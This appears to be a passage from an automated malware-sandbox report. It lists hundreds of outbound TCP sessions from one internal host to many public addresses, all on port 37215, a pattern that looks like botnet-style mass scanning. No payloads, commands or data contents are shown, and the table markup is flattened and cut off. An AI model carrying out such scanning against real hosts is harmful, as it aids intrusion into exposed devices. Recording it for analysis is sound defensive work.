                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22759192.168.2.1543268121.247.87.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22760192.168.2.155606441.93.175.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22761192.168.2.1551496122.78.108.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22762192.168.2.1534710222.53.82.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22763192.168.2.1549194147.204.189.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22764192.168.2.1556294186.171.222.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22765192.168.2.1533698157.106.191.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22766192.168.2.155669445.90.244.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22767192.168.2.1534006181.62.190.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22768192.168.2.1555408122.180.36.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22769192.168.2.153807637.47.169.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22770192.168.2.1549980222.129.75.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22771192.168.2.1544992186.94.242.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22772192.168.2.1545034190.121.37.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22773192.168.2.154618241.120.44.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22774192.168.2.1537596222.183.195.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22775192.168.2.1555396197.20.174.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22776192.168.2.154433294.249.209.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22777192.168.2.154859045.65.16.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22778192.168.2.1547026190.134.96.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22779192.168.2.155063437.66.96.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22780192.168.2.154247231.13.20.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22781192.168.2.1536588222.178.248.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22782192.168.2.155349841.46.225.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22783192.168.2.156027641.46.6.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22784192.168.2.1551156222.243.9.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22785192.168.2.154187037.96.220.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22786192.168.2.1556488121.0.54.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22787192.168.2.155979094.130.190.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22788192.168.2.153752094.120.169.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22789192.168.2.1539152186.146.40.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22790192.168.2.1542504121.225.64.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22791192.168.2.153658031.204.127.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22792192.168.2.1558022163.159.111.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22793192.168.2.1545304156.89.81.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22794192.168.2.1535646197.144.243.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22795192.168.2.1538424144.13.114.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22796192.168.2.1548446157.26.62.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22797192.168.2.1546430157.4.223.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22798192.168.2.154811068.97.167.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22799192.168.2.153605494.225.159.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22800192.168.2.156083475.215.242.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22801192.168.2.1548006181.47.78.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22802192.168.2.1549642197.247.240.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22803192.168.2.155575237.141.51.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22804192.168.2.1557942102.25.83.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22805192.168.2.1556242190.49.161.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22806192.168.2.1546472157.51.166.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22807192.168.2.154603841.43.180.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22808192.168.2.154639094.106.46.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22809192.168.2.1539638138.21.186.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22810192.168.2.1556538138.108.181.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22811192.168.2.1559840156.108.103.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22812192.168.2.1540300138.250.130.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22813192.168.2.1545046122.158.18.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22814192.168.2.1550808122.170.21.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22815192.168.2.1542170181.57.226.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22816192.168.2.1540140121.235.145.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22817192.168.2.1557144157.31.103.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22818192.168.2.1549616181.174.63.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22819192.168.2.1535448102.214.212.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22820192.168.2.1534012157.212.86.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22821192.168.2.1550180181.245.178.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22822192.168.2.154082645.154.118.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22823192.168.2.153836245.228.38.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22824192.168.2.154164245.42.37.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22825192.168.2.1542320102.216.37.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22826192.168.2.1551504190.23.191.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22827192.168.2.1560828181.119.190.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22828192.168.2.154400831.181.138.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22829192.168.2.154514831.1.119.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22830192.168.2.1557328156.156.21.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22831192.168.2.1541636222.241.124.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22832192.168.2.1559864138.115.215.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22833192.168.2.1549360121.176.243.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22834192.168.2.1540552138.42.46.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22835192.168.2.154796845.177.90.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22836192.168.2.1552286181.39.124.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22837192.168.2.1542848122.17.82.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22838192.168.2.1559202121.6.1.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22839192.168.2.1551828121.235.161.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22840192.168.2.1543808122.201.201.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22841192.168.2.1559750156.163.40.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22842192.168.2.155210837.198.133.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22843192.168.2.154371494.185.64.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22844192.168.2.1543260156.82.149.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22845192.168.2.154622694.132.72.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22846192.168.2.154071845.177.199.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22847192.168.2.1534306157.77.49.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22848192.168.2.1537374122.18.136.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22849192.168.2.1550392190.232.124.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22850192.168.2.1544616222.191.94.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22851192.168.2.1542416157.152.183.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22852192.168.2.1555462181.216.241.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22853192.168.2.153864490.244.19.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22854192.168.2.155941841.24.6.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22855192.168.2.1550000222.32.47.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22856192.168.2.1539410222.53.41.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22857192.168.2.1540878102.26.46.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22858192.168.2.1558058181.190.81.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22859192.168.2.1549472197.25.130.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22860192.168.2.1553306186.100.241.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22861192.168.2.1556786138.33.171.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22862192.168.2.154412845.168.78.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22863192.168.2.1543832157.13.129.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22864192.168.2.1536338181.64.251.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22865192.168.2.1549390157.12.204.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22866192.168.2.1545122181.53.10.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22867192.168.2.155790031.112.2.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22868192.168.2.1536308190.119.139.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22869192.168.2.1537400157.231.94.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22870192.168.2.155447631.106.154.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22871192.168.2.1555702197.26.83.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22872192.168.2.1559114121.255.53.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22873192.168.2.1549794222.12.148.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22874192.168.2.155805294.37.167.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22875192.168.2.1538248122.226.233.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22876192.168.2.15453129.65.1.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22877192.168.2.1554120138.65.210.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22878192.168.2.153780441.175.244.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22879192.168.2.1553212197.253.245.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22880192.168.2.1532936121.99.211.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22881192.168.2.1537594121.190.218.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22882192.168.2.1541442157.56.90.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22883192.168.2.154037294.18.33.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22884192.168.2.1538388121.146.14.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22885192.168.2.1556554102.187.253.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22886192.168.2.1540192186.4.199.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22887192.168.2.154475694.99.223.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22888192.168.2.154661431.192.90.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22889192.168.2.1546234156.81.136.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22890192.168.2.1539838190.102.148.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22891192.168.2.1534714156.237.200.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22892192.168.2.154830237.157.131.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22893192.168.2.153706441.122.27.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22894192.168.2.153694237.62.229.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22895192.168.2.155070294.153.11.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22896192.168.2.1556878156.2.18.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22897192.168.2.1546398186.73.54.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22898192.168.2.1536302102.17.33.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22899192.168.2.1554468121.1.247.15037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22900192.168.2.1548854222.205.2.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22901192.168.2.1538660102.220.135.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22902192.168.2.1552840181.85.124.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22903192.168.2.154871037.98.136.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22904192.168.2.1538958181.57.22.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22905192.168.2.1546066121.100.220.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22906192.168.2.1548144156.250.66.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22907192.168.2.154328631.76.7.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22908192.168.2.154399094.31.164.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22909192.168.2.1539998222.90.93.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22910192.168.2.153790437.140.244.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22911192.168.2.155104894.109.59.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22912192.168.2.154549094.191.213.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22913192.168.2.153901445.23.158.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22914192.168.2.1538750122.13.154.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22915192.168.2.1541440157.222.30.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22916192.168.2.154586041.143.224.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22917192.168.2.1545068138.42.112.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22918192.168.2.1541382157.225.108.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22919192.168.2.1536636177.205.173.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22920192.168.2.1559212102.125.195.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22921192.168.2.1538242197.22.183.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22922192.168.2.1538874190.13.112.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22923192.168.2.1559246156.176.13.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22924192.168.2.153662637.81.175.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22925192.168.2.155152294.85.166.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22926192.168.2.154077037.74.137.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22927192.168.2.1535810102.223.197.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22928192.168.2.1551764174.126.41.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22929192.168.2.1551006122.0.81.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22930192.168.2.1545690197.32.126.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22931192.168.2.1539392156.181.54.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22932192.168.2.1556096157.201.220.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22933192.168.2.1549474197.168.135.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22934192.168.2.1552860186.9.211.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22935192.168.2.155158494.184.20.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22936192.168.2.1538262197.196.113.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22937192.168.2.1560346122.23.184.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22938192.168.2.153435637.24.108.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22939192.168.2.1537550181.1.175.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22940192.168.2.1546076181.133.240.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22941192.168.2.1552258222.201.55.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22942192.168.2.1549538102.231.201.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22943192.168.2.1547300181.140.95.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22944192.168.2.1554068122.240.114.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22945192.168.2.154598641.206.187.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22946192.168.2.1553140181.69.213.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22947192.168.2.1534122156.0.164.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22948192.168.2.1549530121.209.156.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22949192.168.2.1554320157.184.59.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22950192.168.2.1533896122.90.205.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22951192.168.2.1553058102.154.35.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22952192.168.2.1557994122.207.38.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22953192.168.2.155751694.155.17.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22954192.168.2.155609631.168.31.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22955192.168.2.1541308121.45.237.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22956192.168.2.1540674197.49.252.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22957192.168.2.1554258102.245.201.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22958192.168.2.1549106190.27.49.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22959192.168.2.1549458222.25.151.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22960192.168.2.1545528190.110.33.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22961192.168.2.1560658186.4.68.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22962192.168.2.1557472157.37.99.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22963192.168.2.1534660157.213.10.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22964192.168.2.1543026157.60.148.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22965192.168.2.154030894.89.102.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22966192.168.2.1537614186.135.195.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22967192.168.2.1536242181.91.59.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22968192.168.2.1541204186.112.0.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22969192.168.2.155896645.242.122.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22970192.168.2.1545360222.81.226.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22971192.168.2.1548096222.83.48.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22972192.168.2.1546416122.26.115.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22973192.168.2.1549444119.7.190.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22974192.168.2.1544256156.218.46.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22975192.168.2.1546174102.99.117.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22976192.168.2.1536472222.142.11.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
